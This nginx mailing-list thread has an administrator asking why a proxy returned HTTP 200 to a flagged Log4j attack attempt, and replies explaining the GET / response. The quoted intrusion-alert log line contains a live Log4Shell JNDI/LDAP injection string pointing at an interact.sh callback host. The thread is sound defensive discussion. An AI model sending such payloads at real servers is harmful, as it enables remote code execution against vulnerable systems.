Nginx is returning a 200 because the request is a "GET /", and I am assuming 
your nginx configurations allow GETs to "/".

Justin

On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" 
<nginx-boun...@nginx.org on behalf of mauro.trid...@cmcc.it> wrote:

    CAUTION: The e-mail below is from an external source. Please exercise 
caution before opening attachments, clicking links, or following guidance.

    Thank you very much for your reply. I really appreciated it.
    I’ll wait for the final gurus feedback too.

    Mauro

    > On 29 Dec 2021, at 18:03, lists <li...@lazygranch.com> wrote:
    > 
    > That IP space is certified shady. I detect the occasional hack from them. 
See 
    > 
    > 
https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
    > 
    > and
    > 
    > https://wirelessdataspco.org/faq.php
    > 
    > These wireless companies will do anything for money including leasing 
their IP space. 
    > 
    > I don't block the IP space since it could be from normal users. Plus 
plenty of hacking comes from actual wireless providers customers. But I am 
appalled highly profitable wireless providers lease ipv4 space to hackers for 
what is pocket change for them. 
    > 
    > I will leave it up to the gurus to parse the log.  
    > 
    > 
    > 
    > 
    > 
    > 
    >     Original Message      
    > 
    > 
    > From: mauro.trid...@cmcc.it
    > Sent: December 29, 2021 6:55 AM
    > To: nginx@nginx.org
    > Reply-to: nginx@nginx.org
    > Subject: Help request about Log4j attack attempts and NGINX logs meaning
    > 
    > 
    > 
    > 
    > Dear Users,
    > 
    > 
    > I have an old instance of NGINX (v.1.10.1) running as proxy server on a 
dedicated hardware platform.
    > Since the proxy service is reachable from internet, it is constantly 
exposed to cyber attacks.
    > In my particular case, it is attacked by a lot of Log4j attack attempts 
from several malicious IPs.
    > 
    > 
    > At this moment, an host intrusion detection system (HIDS) is running and 
is protecting the NGINX server: it seems it is blocking every malicious attack 
attempts.
    > Anyway, during the last attack mail notification sent by the HIDS, I 
noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried 
about it.
    > Log4j and Java packages are NOT installed on the NGINX server and all the 
servers behind the proxy are not using Log4j.
    > 
    > 
    > Could you please help me to understand the reason why the NGINX server 
answer was “HTTP/1.1 200”!?
    > 
    > 
    > You can see below the mail notification I received:
    > 
    > 
    > 
    > Attack Notification.
    > 2021 Dec 28 20:45:59
    > 
    > Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
    > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
    > Src IP: 166.137.252.110
    > Portion of the log(s):
    > 
    > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET 
/?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a}
 HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
    > 
    > 
    > Thank you in advance,
    > Mauro 
    > _______________________________________________
    > nginx mailing list
    > nginx@nginx.org
    > http://mailman.nginx.org/mailman/listinfo/nginx


    _______________________________________________
    nginx mailing list
    nginx@nginx.org
    http://mailman.nginx.org/mailman/listinfo/nginx

E-MAIL CONFIDENTIALITY NOTICE: 
The contents of this e-mail message and any attachments are intended solely for 
the addressee(s) and may contain confidential and/or legally privileged 
information. If you are not the intended recipient of this message or if this 
message has been addressed to you in error, please immediately alert the sender 
by reply e-mail and then delete this message and any attachments. If you are 
not the intended recipient, you are notified that any use, dissemination, 
distribution, copying, or storage of this message or any attachment is strictly 
prohibited.
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Reply via email to